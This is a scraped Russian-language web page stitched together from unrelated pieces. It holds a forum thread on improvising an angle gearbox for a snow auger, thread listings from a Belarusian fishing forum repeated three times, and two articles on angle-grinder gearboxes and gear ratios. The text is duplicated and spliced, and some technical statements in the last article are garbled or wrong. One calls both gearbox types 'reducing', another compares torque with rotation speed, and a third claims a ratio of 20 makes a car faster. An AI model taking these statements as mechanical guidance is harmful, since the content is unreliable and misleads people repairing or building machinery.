24 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Редуктор болгарки передаточное число

Редуктор ушм передаточное число

Доброго времени суток!Вопрос вот в чем!Подскажите как и из чего можно сделать угловой редуктор!Хочу приделать снегоуборщик(шнекоротор) к мотоблоку!

Комментарии 37

первое что вспомнилось — редуктор с моста автомобиля, сетеллиты заварить
с болгарки редуктор, с тали, в которой червяк и колесо
еще со всякой техники, надо искать что есть под рукой или недорого раздобыть можно

От болгарки башку сними в ней и редуктор угловой, можно увеличить обороты при помощи его, а можно и убавить, смотря как поставить, там передаточные числа как правило разные, короче когда разберешь сам увидишь

Только глянуть вначале чтоб шестерни были не пластмассовые))

Это само собой, честно говоря ни на одной не видел пластмассовых, много болгарок разбирал, а вот на дрелях есть и пластмассовые

От старой бензопилы — дружба, урал.

От УШМ не пойдёт. Там обороты 6000 и мощность 2 киловатта. А на шнеке обороты до 1000. И мощность киловатта 3-4. Значит момент больше раз в 5 минимум. + за тяжёлые мотоциклы. А может автомобильные редукторы и подоступнее будут

Самый надёжный будет от тяжёлого мотоцикла

Редуктор от мотоциклов урал, днепр.

ОТ БОЛГАРОК ВЫБИРАТЬ УСПЕВАЙ!

У него цена 1/2 нового снегоуборщика 🙂

Угловой рулевой редуктор Opel-Isuzu-Great Wall
3 500 р

Старая ручная дрель 😊

Из болгарки побольше!😁

По-моему вернее говорить конический.

Лодочный редуктор ёУ!Самое то.

впринцыпе понизить можно за счет диаметра шкивов

Вот тут мужик подачу на шнек из такой трещотки делал

для шнека нужен понижающий, и не от бензопилы, недавно выкинул в лом подходящий))

из любой главной передачи. или угловая колонка от лодочного мотора.

Все про охоту и рыбалку в Республике Беларусь — форумы

  • Список форумовСамоделки — форум самодельщиковСамодельные лодочные моторы, лодки и другие транспортные средства
  • Изменить размер шрифта
  • Версия для печати
  • Охота и рыбалка
  • Правила форума
  • Всего наград
  • Регистрация
  • Вход

Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Re: Самодельный лодочный мотор

Владимир656 » 20 мар 2016, 20:29

Продолжу вылаживать фотографии создания второго мотора.

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 20 мар 2016, 20:31

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 20 мар 2016, 20:44

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

TATTOOIST » 20 мар 2016, 21:24

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 21 мар 2016, 10:50

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 21 мар 2016, 14:24

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 22 мар 2016, 19:08

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

serg75 » 22 мар 2016, 21:50

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

sansersan » 22 мар 2016, 22:51

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

ZUBBER » 23 мар 2016, 03:00

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 06:35

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 23 мар 2016, 10:15

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 10:25

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 23 мар 2016, 10:38

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 11:16

  • Похожие темы Ответы Просмотры Последнее сообщение
  • Продам НОВЫЙ лодочный электромотор FLOVER F33TX и АКБ
    pavlushka в форуме Покупка-продажа рыболовных снастей и снаряжения 0 10741 pavlushka
    18 сен 2009, 19:08
  • Куплю лодочный электромотор . также нужен аккумулятор
    ерш в форуме Покупка-продажа рыболовных снастей и снаряжения 0 6223 ерш
    08 сен 2013, 13:56
  • Продаю лодочный электромотор MINN KOTA 34
    ANDRUHA в форуме Покупка-продажа рыболовных снастей и снаряжения 0 8148 ANDRUHA
    19 мар 2012, 05:26
  • Продам лодочный ЭЛЕКТРОМОТОР MinnKota с акуумулятором
    Falconer17 в форуме Покупка-продажа рыболовных снастей и снаряжения 2 1215 Falconer17
    28 окт 2017, 15:51
  • Продам Лодочный электромотор Nissamaran Ecomotor 36 Pro
    URSUS в форуме Покупка-продажа рыболовных снастей и снаряжения 0 607 URSUS
    15 июн 2018, 11:57
  • Продаем Адаптер лодочный для мотокосы
    inin в форуме Покупка-продажа рыболовных снастей и снаряжения 2 1147 Alexander2k
    30 май 2018, 10:43
  • продам лодочный электромотор
    peter111270 в форуме Покупка-продажа рыболовных снастей и снаряжения 0 6809 peter111270
    03 июн 2013, 16:09
  • Отцеп для блесен, самодельный отцеп
    1 , 2ZUBBER в форуме Самоделки для рыбалки и сопутствующее 15 31697 пекарь
    04 дек 2013, 19:46
  • Продам ящик для зимней рыбалки, самодельный. Витебск.
    Глеб Владимирович в форуме Покупка-продажа рыболовных снастей и снаряжения 0 9845 Глеб Владимирович
    06 дек 2010, 01:12
  • продам ясчик оружейный самодельный
    ТРУС в форуме Покупка-продажа охотничьего оружия, снаряжения 0 6017 ТРУС
    27 фев 2014, 19:23

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 3

Рекомендованные сообщения

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Войти

Уже зарегистрированы? Войдите здесь.

Сейчас на странице 0 пользователей

Нет пользователей, просматривающих эту страницу.

Редукторы

Возможность использовать один и тот же электроинструмент для обработки различных материалов (металлы, камень, дерево, пластик, бетон и другие) делает болгарку очень востребованной у пользователей. Размеры насадок вместе с редуктором обеспечивают оптимальные обороты для безопасной и эффективной работы.

Устройство, принцип работы и назначение УШМ

Источником вращающего момента для инструмента болгарок является встроенный в их конструкцию коллекторный электродвигатель. Окончательная рабочая величина момента вращения на рабочей насадке достигается с помощью редуктора, конструкция которого отличается компактностью для обеспечения минимальных габаритов всего электроинструмента, что является важным параметром для ручного использования устройства.

Схема работы болгарки. Источник здесь

Из технического названия УШМ следует ее основное предназначение — шлифовка поверхностей обрабатываемых материалов. Однако, универсализм и многофункциональность болгарок позволяют при помощи сменных насадок выполнять такие технологические операции как резка, зачистка, полирование и некоторые другие.

Как устроен редуктор, в разрезе, фото и чертежи

Минимальные габариты редуктора обеспечиваются применением конической передачи. Малая коническая шестерня входит в зацепление с большой, при этом меняется на 90° направление вращения вала ротора электродвигателя, чем сокращается размер болгарки в длину. Узкая по толщине ведомая шестерня позволяет конструкцию корпуса редуктора сделать максимально плоской, что обеспечивает работу болгарки в труднодоступных местах.

Редуктор болгарки в разрезе. Источник фото здесь.

Опорные узлы валов ротора и шпинделя выполняются с применением шарикоподшипников, игольчатых и втулок из антифрикционных материалов в зависимости от модели болгарки, способных выдерживать большие осевые нагрузки. Корпус, в котором собраны валы ведомой и ведущей шестерен, подшипниковые узлы надежно защищает от пыли, которая образуется при работе болгаркой. Пример конструкции редуктора на представленном изображении. Как разобрать с целью диагностиик и проведения ремонта возможно узнать из отдельной статьи.

Регулировка

Конический редуктор болгарки будет без проблем работать при свободно вращающихся в подшипниках валах, которые не имеют люфтов. Это достигается установкой дополнительных металлических прокладок на ведущем и ведомом валах, для устранения зазоров образовавшихся в процессе сборки.

Особенностью конической передачи является регулировка самого зацепления. Необходимо обеспечить совмещение начальных конусов шестерен. Здесь также следует учесть наличие теплового зазора, который исключает заклинивание передачи при нагреве во время работы. Для этого между корпусом и крышкой редуктора устанавливаются металлические прокладки. Контроль правильности регулировки осуществляется по пятну контакта. Практически это делается нанесением красящего вещества, например, синьки на поверхности зубьев и после обкатки на рабочем режиме визуально определяется площадь рабочей поверхности зуба, на которой синька отсутствует. Правильное расположение и размеры пятна контакта на изображении ниже.

В зависимости от степени точности передачи должно быть:

В болгарках между крышкой и корпусом редуктора устанавливаются металлические прокладки, количество которых соответствует правильной начальной регулировки зацепления. По мере износа зубьев для сохранения зазора и нормальной работы передачи часть прокладок убирается, тем самым обеспечивается продолжительность эксплуатации редуктора болгарки.

Передаточное число (отношение)

УШМ (болгарка) MAKITA GA9010C. Фото 220Вольт

В классическом понимании передаточное отношение редуктора болгарки, как собственно и любого другого механического редуктора, это отношение оборотов ведущего вала к оборотам ведомого. Для большинства УШМ оно колеблется от 2,5 до 4. Редуктор является понижающим с целью обеспечить обороты, при которых не происходит быстрый перегрев обрабатываемой поверхности и достигается требуемая для работы величина крутящего момента.

В большей степени передаточное отношение редукторов болгарки зависит не от модели производителя, а от мощности болгарок. Менее мощные болгарки имеют более высокие обороты шпинделя и соответственно меньшее передаточное число. Для мощных профессиональных болгарок важен высокий крутящий момент и для работы с насадками больших диаметров с целью обеспечения безопасности не применяются большие обороты шпинделя. Здесь передаточные отношения ближе к максимальным значениям.

Какие бывают редукторы: прямой, понижающий, угловой и прочие

Механический редуктор — это механизм, передающий от двигательной установки необходимые для функционирования приводного устройства параметры крутящего момента и скорости вращения вала. Некоторые виды редукторов могут менять направление их вращения.

Редуктора с соосными (параллельными) валами, как правило, в большинстве своем представляют самые распространенные с цилиндрической зубчатой передачей. Они могут иметь различные передаточные отношения и количество ступеней преобразования. Передача хода передается плавно, практически без потерь, но изменить направление вращения вала они не могут.

Редуктор болгарки со смазкой

Угловые редукторы, которые используются в болгарках, способны обеспечить направление валов на 90°. Конические шестерни могут быть как с прямым зубом, так и с круговым. На некоторых маломощных бытовых болгарках, например, модели Bosch, используется передача с прямыми зубьями, где не предъявляются требования к плавности хода и уровню шума. Круговые зубья обладают большей несущей способностью, имеют меньший уровень шума из-за плавности зацепления, менее чувствительны к погрешностям сборки.

В зависимости от величины передаточного отношения редукторы подразделяются на следующие виды.

  • Прямой. Передаточное отношение равно 1. Такой редуктор используется, например, в некоторых многовальных коробках передач грузовых автомобилей.
  • Повышающий. По другому он называется мультипликатором, где передаточное отношение имеет значение меньше 1. Главное назначение мультипликатора — увеличение угловой скорости. При этом крутящий момент на выходном валу уменьшается.
  • Понижающий. Здесь передаточное отношение больше 1. В большинстве случаях в различных механизмах, к таким относится и УШМ, применяется такой редуктор.

Принципов редуцирования, как и конструктивных исполнений, существует большое разнообразие. Однако каждому механизму наилучшим образом подходит определенный вид. Болгарки без конического редуктора представить уже достаточно трудно.

Частые неисправности, причины и решение, запчасти

Шестерни редуктора (компл.) BOSCH GWS 6-100. Фото 220Вольт

Работа в тяжелых эксплуатационных условиях (некачественная смазка шестерен, длительная работа при повышенных нагрузках, наличие большого количества пыли при работе и другие), долговременный период использования электроинструмента приводят к появлению поломок редуктора, где наиболее характерные следующие.

  • Износ рабочей поверхности конической пары шестерен, при котором редуктор работает с повышенным шумом, а по достижении критической величины возможно проскальзывание шестерен друг относительно друга.
  • Ресурс работы подшипников ограничен. Шум и вибрация при работе болгарки являются факторами, при появлении которых следует проверить подшипники на наличие люфтов. Изношенные подшипники подлежат замене (ссылка на статью об этом).
  • При жесткой эксплуатации возможен скол и поломка зубьев шестерен редуктора. Здесь возникает очень сильная вибрация болгарки при работе, сопровождаемая немалым шумом.

Решить проблему восстановления работоспособности болгарки можно самостоятельно при наличии необходимых инструментов, запчастей, навыков работы слесарем. Если нет уверенности в собственных силах, рекомендуется обратиться в сервисные центры, где ремонтом займутся профессионалы. Выбрать подходящий можно по этой ссылке. В отдельном разделе представлены компании, в которых сделают качественный ремонт и заменят вышедшие из строя детали на новые, имеющиеся в наличии у сервиса.

Где купить корпус и прочие комплектующие

Купить корпус редуктора и другие запчасти, комплектующие возможно у сотрудников компаний-поставщиков, которые собраны в соответствующем разделе.

Редуктор ушм передаточное число

Доброго времени суток!Вопрос вот в чем!Подскажите как и из чего можно сделать угловой редуктор!Хочу приделать снегоуборщик(шнекоротор) к мотоблоку!

Комментарии 37

первое что вспомнилось — редуктор с моста автомобиля, сетеллиты заварить
с болгарки редуктор, с тали, в которой червяк и колесо
еще со всякой техники, надо искать что есть под рукой или недорого раздобыть можно

От болгарки башку сними в ней и редуктор угловой, можно увеличить обороты при помощи его, а можно и убавить, смотря как поставить, там передаточные числа как правило разные, короче когда разберешь сам увидишь

Только глянуть вначале чтоб шестерни были не пластмассовые))

Это само собой, честно говоря ни на одной не видел пластмассовых, много болгарок разбирал, а вот на дрелях есть и пластмассовые

От старой бензопилы — дружба, урал.

От УШМ не пойдёт. Там обороты 6000 и мощность 2 киловатта. А на шнеке обороты до 1000. И мощность киловатта 3-4. Значит момент больше раз в 5 минимум. + за тяжёлые мотоциклы. А может автомобильные редукторы и подоступнее будут

Самый надёжный будет от тяжёлого мотоцикла

Редуктор от мотоциклов урал, днепр.

ОТ БОЛГАРОК ВЫБИРАТЬ УСПЕВАЙ!

У него цена 1/2 нового снегоуборщика 🙂

Угловой рулевой редуктор Opel-Isuzu-Great Wall
3 500 р

Старая ручная дрель 😊

Из болгарки побольше!😁

По-моему вернее говорить конический.

Лодочный редуктор ёУ!Самое то.

впринцыпе понизить можно за счет диаметра шкивов

Вот тут мужик подачу на шнек из такой трещотки делал

для шнека нужен понижающий, и не от бензопилы, недавно выкинул в лом подходящий))

из любой главной передачи. или угловая колонка от лодочного мотора.

Все про охоту и рыбалку в Республике Беларусь — форумы

  • Список форумовСамоделки — форум самодельщиковСамодельные лодочные моторы, лодки и другие транспортные средства
  • Изменить размер шрифта
  • Версия для печати
  • Охота и рыбалка
  • Правила форума
  • Всего наград
  • Регистрация
  • Вход

Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Re: Самодельный лодочный мотор

Владимир656 » 20 мар 2016, 20:29

Продолжу вылаживать фотографии создания второго мотора.

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 20 мар 2016, 20:31

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 20 мар 2016, 20:44

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

TATTOOIST » 20 мар 2016, 21:24

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 21 мар 2016, 10:50

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 21 мар 2016, 14:24

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 22 мар 2016, 19:08

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

serg75 » 22 мар 2016, 21:50

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

sansersan » 22 мар 2016, 22:51

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

ZUBBER » 23 мар 2016, 03:00

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 06:35

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 23 мар 2016, 10:15

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 10:25

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 23 мар 2016, 10:38

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 11:16

  • Похожие темы Ответы Просмотры Последнее сообщение
  • Продам НОВЫЙ лодочный электромотор FLOVER F33TX и АКБ
    pavlushka в форуме Покупка-продажа рыболовных снастей и снаряжения 0 10741 pavlushka
    18 сен 2009, 19:08
  • Куплю лодочный электромотор . также нужен аккумулятор
    ерш в форуме Покупка-продажа рыболовных снастей и снаряжения 0 6223 ерш
    08 сен 2013, 13:56
  • Продаю лодочный электромотор MINN KOTA 34
    ANDRUHA в форуме Покупка-продажа рыболовных снастей и снаряжения 0 8148 ANDRUHA
    19 мар 2012, 05:26
  • Продам лодочный ЭЛЕКТРОМОТОР MinnKota с акуумулятором
    Falconer17 в форуме Покупка-продажа рыболовных снастей и снаряжения 2 1215 Falconer17
    28 окт 2017, 15:51
  • Продам Лодочный электромотор Nissamaran Ecomotor 36 Pro
    URSUS в форуме Покупка-продажа рыболовных снастей и снаряжения 0 607 URSUS
    15 июн 2018, 11:57
  • Продаем Адаптер лодочный для мотокосы
    inin в форуме Покупка-продажа рыболовных снастей и снаряжения 2 1147 Alexander2k
    30 май 2018, 10:43
  • продам лодочный электромотор
    peter111270 в форуме Покупка-продажа рыболовных снастей и снаряжения 0 6809 peter111270
    03 июн 2013, 16:09
  • Отцеп для блесен, самодельный отцеп
    1 , 2ZUBBER в форуме Самоделки для рыбалки и сопутствующее 15 31697 пекарь
    04 дек 2013, 19:46
  • Продам ящик для зимней рыбалки, самодельный. Витебск.
    Глеб Владимирович в форуме Покупка-продажа рыболовных снастей и снаряжения 0 9845 Глеб Владимирович
    06 дек 2010, 01:12
  • продам ясчик оружейный самодельный
    ТРУС в форуме Покупка-продажа охотничьего оружия, снаряжения 0 6017 ТРУС
    27 фев 2014, 19:23

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 3

Рекомендованные сообщения

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Войти

Уже зарегистрированы? Войдите здесь.

Сейчас на странице 0 пользователей

Нет пользователей, просматривающих эту страницу.

Охота и рыбалка в Беларуси

Все про охоту и рыбалку в Республике Беларусь — форумы

  • Список форумовСамоделки — форум самодельщиковСамодельные лодочные моторы, лодки и другие транспортные средства
  • Изменить размер шрифта
  • Версия для печати
  • Охота и рыбалка
  • Правила форума
  • Всего наград
  • Регистрация
  • Вход

Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Re: Самодельный лодочный мотор

Владимир656 » 20 мар 2016, 20:29

Продолжу вылаживать фотографии создания второго мотора.

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 20 мар 2016, 20:31

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 20 мар 2016, 20:44

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

TATTOOIST » 20 мар 2016, 21:24

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 21 мар 2016, 10:50

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 21 мар 2016, 14:24

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 22 мар 2016, 19:08

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

serg75 » 22 мар 2016, 21:50

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

sansersan » 22 мар 2016, 22:51

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

ZUBBER » 23 мар 2016, 03:00

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 06:35

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 23 мар 2016, 10:15

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 10:25

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Владимир656 » 23 мар 2016, 10:38

Re: Самодельный лодочный мотор. Лодочный мотор из бензокосы.

Дальнобой » 23 мар 2016, 11:16

  • Похожие темы Ответы Просмотры Последнее сообщение
  • Отцеп для блесен, самодельный отцеп
    1 , 2ZUBBER в форуме Самоделки для рыбалки и сопутствующее 15 32111 пекарь
    04 дек 2013, 19:46
  • самодельный квок для ловли сома
    Александр Тарасенко в форуме Самоделки для рыбалки и сопутствующее 1 9033 Виктор1972
    13 авг 2014, 18:10
  • Самодельный гриндерок начинающему ножеделу.
    Сыч в форуме Разное, любые «технические штуки», курилка самодельщиков 7 3526 Kras
    27 авг 2018, 00:42
  • Самодельный снегоуборщик
    СерегаД в форуме Самодельные лодочные моторы, лодки и другие транспортные средства 4 14225 Сергей19
    22 дек 2013, 10:10
  • сломался двигатель бензокосы
    1 , 2Бензокоса в форуме Самодельные лодочные моторы, лодки и другие транспортные средства 27 19612 СТАРиК°
    11 июл 2014, 21:40
  • ПРОДАМ: Лодка — казанка, мотор HONDA 4,5 л/с, лафет
    Anonymous в форуме Свободные темы, разговоры на любую тематику. Offtopic. 1 5053 Белаус
    02 янв 2011, 16:28
  • Какой мотор лучше?
    1 , 2-Nicson- в форуме Снасти и экипировка — общие вопросы 27 10074 dima.albert
    23 май 2017, 08:50
  • мотор Масква-М
    Кирилл зубаировн в форуме Самодельные лодочные моторы, лодки и другие транспортные средства 1 1215 dimon—1976
    27 сен 2016, 12:59
  • мотор лодочный из бензотриммера +транец за 4500р.
    1 , 2dron2803 в форуме Самодельные лодочные моторы, лодки и другие транспортные средства 15 11230 ANDREY674
    14 дек 2012, 20:10
  • лодочный мотор из китайской мотопомпы
    1 , 2 , 3uwcerputz в форуме Самодельные лодочные моторы, лодки и другие транспортные средства 38 33338 uwcerputz
    20 дек 2010, 13:24

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 3

Передаточное число редуктора

Передаточное число редуктора – словосочетание, которое мало кого волнует до определенного момента. Большинство автовладельцев редко интересуются, какие же передаточные числа в их автомобиле и не понимают, что это такое и зачем нужна эта информация. Но нужно понимать, чем лучше автовладелец знает своей автомобиль и правильно им пользуется, тем дольше и стабильнее отслужит железный конь.

Автомобилисты задаются вопросом, как узнать передаточное число редуктора, когда возникают проблемы с ним. Такая информация нужна в нескольких случаях:

  • когда нужно полностью поменять дефектный узел или заменить определенную деталь;
  • при замене узла на модель, отличающуюся от стандартного, что очень важно для понимания того, как поведет себя автомобиль после замены.

Существуют определенные советы, соблюдая которые можно самостоятельно разобраться в работе и строении редуктора и правильно вычислить его параметры.

Общее определение

Редуктор, как конструкционный элемент, применяется в множестве механизмов. Это технический узел, необходимый для коррекции скорости вращения при передаче движения. Изобретение и распространение редукторов произошло во время развития двигателей разного типа. Это объясняется тем, что появилась необходимость превращать высокую оборотную скорость в усилие крутящего момента, или же наоборот. Для различных целей существует множество разновидностей редукторов, выбор которых играет важнейшую роль для нормального функционирования механизмов.

Передаточное число – это основной параметр, который характеризует различные модели редукторов. Оно зависит от типа, параметров и ступеней шестерен.

Передаточное отношение редуктора обозначается мультипликатором, который свидетельствует о типе механизма: понижающий он, или понижающий. Понижающие передаточные редукторы имеют мультипликатор больше 1, редуктор с передаточным числом менее 1 называется повышающим.

В автомобилях редуктора используются для перенаправления силового импульса на колеса с коробки передач, причем всегда скорость вращения снижается. Передаточное число — показатель того, во сколько раз скорость уменьшится. Если передаточное число равняется 4 — это означает, что крутящий момент, передающийся с редуктора на ось, в 4 раза меньше, чем скорость вращения трансмиссии.

Обычно такой механизм устанавливается на ведущую ось, если автомобиль является полноприводным, то устанавливаются два, по одному на каждую ось.

Редуктор не обязательно должен строго соответствовать установленным заводским параметрам, в некоторых случаях при поломке можно заменить на новый узел с меньшим или большим передаточным числом. Как проверить, какой механизм подойдет? Обычно можно делать замену на модели, в которых номинальное передаточное число отличаются не более чем на 0,5 в большую или меньшую сторону. Если взять, к примеру, редукторы автомобилей ВАЗ, есть возможность устанавливать 4 модели. Соответственно скорость работы редуктора уменьшается при увеличении передаточного числа.

Поэтому скорость автомобиля напрямую зависит от скорости работы редуктора, и с помощью замены этого узла можно сделать свой автомобиль более шустрым, например, поставив узел с передаточным числом 20.

Если автомобиль используется для грузовых перевозок, езды по пересеченной местности, рекомендуется устанавливать модель с более низким передаточным числом. Это добавит мощности на ось, несмотря на уменьшение скорости.

При замене узла на модель с большим или меньшим числом, стоит позаботиться о правильной работе спидометра. Так как очень часто он начинает показывать некорректные показатели. Нужно либо заменить тросик, при серьезном сбое, либо просто отрегулировать спидометр.

Что удивительно, при замене редуктора, снять старый и установить новый это самое простое, сложнее всего все правильно отрегулировать и настроить, чтобы общее передаточное число соответствовало необходимым параметрам. Если это не удастся, то даже самый качественный редуктор может быстро выйти из строя.

Способы определения

Существует несколько способов, как определить передаточное число редуктора:

Первый, наиболее простой, способ – теоретический. Обычно, для того, чтобы узнать необходимую информацию, нужно просто заглянуть в инструкцию автомобиля, где указаны подробные таблицы. Большинство авто содержат такую информацию в Vin-номере, где она зашифрована, но ее легко узнать. Автомобили российского производства обычно имеют стандартный набор типовых моделей редукторов. Это значительно облегчает процесс замены.

Другое дела, когда необходимо заменить только отдельную часть узла. Обычно, когда автомобиль сменил нескольких владельцев, неизвестно сколько раз редуктор заменялся и какая модель установлена в данный момент. Сделать это часто достаточно легко, так как необходимую информацию стараются нанести на места, наиболее удобные для просмотра.

Практический способ определения передаточного числа редуктора более сложный и требует прямого вмешательства в механизм автомобиля. Разберем подробную пошаговую инструкцию:

  1. Первое, что нужно сделать, это узнать какая модель установлена на вашем автомобиле. Существует несколько типов, которые отличаются в зависимости от типа передачи зацепления, бывают зубчатые, цепные, винтовые, гипоидные, волновые и фракционные. Передаточное число в любом случае считается как отношение скорости вращения ведомого и ведущего вала. Если вышеуказанные данные известны, придется прибегнуть к разбору узла.
  2. Нужно отсоединить редуктор от корпуса и сопутствующих узлов и открыть крышку, чтобы иметь обзор конструктивных элементов. С помощью таких манипуляций можно точно узнать, от какого элемента редуктора стоит отталкиваться при расчете.
  3. Затем провести расчет передаточного числа исходя из типа узла. Если передача зубчатая, то провести расчет довольно легко, в таком случае расчетный показатель равняется отношению количества зубьев ведомой шестерни к зубьяv ведущей. Нужно просто посчитать указанные параметры.
  4. Если передача ременная, подсчет происходит путем соотношения диаметра ведущего шкива к ведомому, или наоборот. Расчет всегда проводиться от большего числа. При цепной передачи, нужно посчитать количество зубьев ведущей и ведомой звезды, и просчитать соотношение большей к меньшей. При червячной передаче, считается количество заходов на червяке и зубья на червячном колесе, после чего рассчитывается отношение второго полученного числа к первому.

Расчетный способ измерения передаточного числа заднего редуктора заключается в фиксации скорости вращения обоих валов.

Для этого нужно использовать специальный измерительный прибор – тахометр, с помощью которого измеряется скорость вращения приводного вала двигателя и вала, приводящего в движение колеса. Соотношение первого показателя к второму поможет точно определить передаточное число.

Можно делать это проще, посчитав крутящий момент редуктора с помощью вращения колеса. Ведущую ось нужно приподнять на опорах. Фиксируется изначальное положение колеса и ведущего вала, сделать это можно с помощью простых меток. Затем стоит вращать колеса, пока метки не совпадут и подсчитать отдельно количество оборотов вала и колеса. Для этих целей рационально воспользоваться чьей-либо помощью.

После сбора всей необходимой информации нужно поделить число оборотов ведущего вала на количество вращений колеса. Чтобы получить точный результат, нужно внимательно отнестись к каждому этапу процедуры, так как даже малейшая неточность в измерении может критично повлиять на конечный результат.

Типы редукторов

Все виды устроены по схожему принципу, разница заключается только в типе зубчатой передачи. Чаще всего встречаются цилиндрические, конические, глобоидные, комбинированные, червячные и планетарные, но последнее время конструкторы прибегают к комбинированным конструкциям, что позволяет совместить преимущества нескольких типов.

Конструкция разных типов позволяют передавать усилие между узлами, которые располагаются в различных площадях, будут они перпендикулярные (конический редуктор), параллельные (цилиндрический) или пересекающиеся валы (червячные).

Диапазон передаточного числа может разнится от в несколько единиц до нескольких тысяч, что зависит от количества ступеней. Сейчас наиболее распространены механизмы, при изготовлении которых используются нескольких ступеней. Это позволяет комбинировать несколько типов передач и добиться максимально эффективной работы. Рассмотрим основные типы.

Цилиндрический редуктор

Довольно популярные при разработке и производстве машин различного назначения. Эффективно выполняют свои функции при работе с мощными установками, при этом показывают высокий КПД, превышающий 90 %. Чаще всего используется при работе параллельных и сносных валов. Может применяться с различным количеством ступеней, от которых зависит передаточное число, оно может колебаться от 1,5 до 400.

Червячный редуктор

Имеют довольно простую конструкцию, из-за чего обрели широкую популярность. Одним из плюсов также является низкая стоимость в сравнении с аналогами. Количество ступеней обычно ограничивается одной или двумя. При этом диапазон передаточного числа червячного редуктора может находиться в диапазоне от 5 до 10000, которую можно рассчитать по специальной формуле. Недостатком этого типа является низкий КПД и ограниченные мощности силовых установок, с которыми он работает. Состоит из зубчатого колеса и цилиндрического, реже глобоидного, червяка в виде винта.

Планетарный редуктор

Особый тип, который выгодно отличается от аналогов, имея ряд преимуществ. Благодаря чему получил широкое распространение в тяжелом машиностроении. Конструкция этой модели позволяет добиться высокого передаточного числа при работе с мощнейшими силовыми установками. При этом его размеры могут быть значительно меньшими, чем габариты аналогов. Механизм назван планетарным, из-за специфического расположения конструкционных элементов, к которым относятся: сателлиты, водило, солнечная и кольцевая шестерни.

Передача усилия происходит через вал на солнечную шестерню, которая находится в зацепе со всеми сателлитами. В это время кольцевая шестерня находится в статичном положении. Модель отличается высоким КПД, и работой в диапазоне передаточного числа от 6 до 450.

Выбор типа узла всегда основывается на конструкционных требованиях к механизму, при этом выбором модели должен заниматься квалифицированный конструктор. Первое что нужно определить — какой тип передачи нужен, оптимальный размер механизма, рассчитать осевые нагрузи на валах и температурный режим работы.

От количества ступеней выбранного механизма напрямую зависит передаточное отношение. Одноступенчатые применяются для выполнения простых функций, обычно это червячный тип. Сейчас чаще можно встретить комбинированные типы передач, что позволяет значительно расширить функционал узла.

В качестве входных и выходных валов применяются стандартные прямые валы, изготовлены в форме тел вращения. От их качества напрямую зависит качество работы всего механизма, так как на них действуют множество внешних нагрузок различных типов.

Срок эксплуатации редко зависит от типа и производителя. В первую очередь на это влияет качественный подбор модели, монтаж и эксплуатационное обслуживание.

Очень важно своевременно менять сальники и масло. Постоянные профилактические работы обеспечат стабильную работу и обезопасят от внезапных поломок. Для контроля уровня масла имеется специальное смотровое окно, что позволяет вовремя пополнять необходимый объем.

В целом, самостоятельно рассчитать передаточное число, подобрать подходящую модель и провести замену (ремонт) редуктора не составит труда. Главное соблюдать рекомендации специалистов и технические инструкции, указанные производителем.

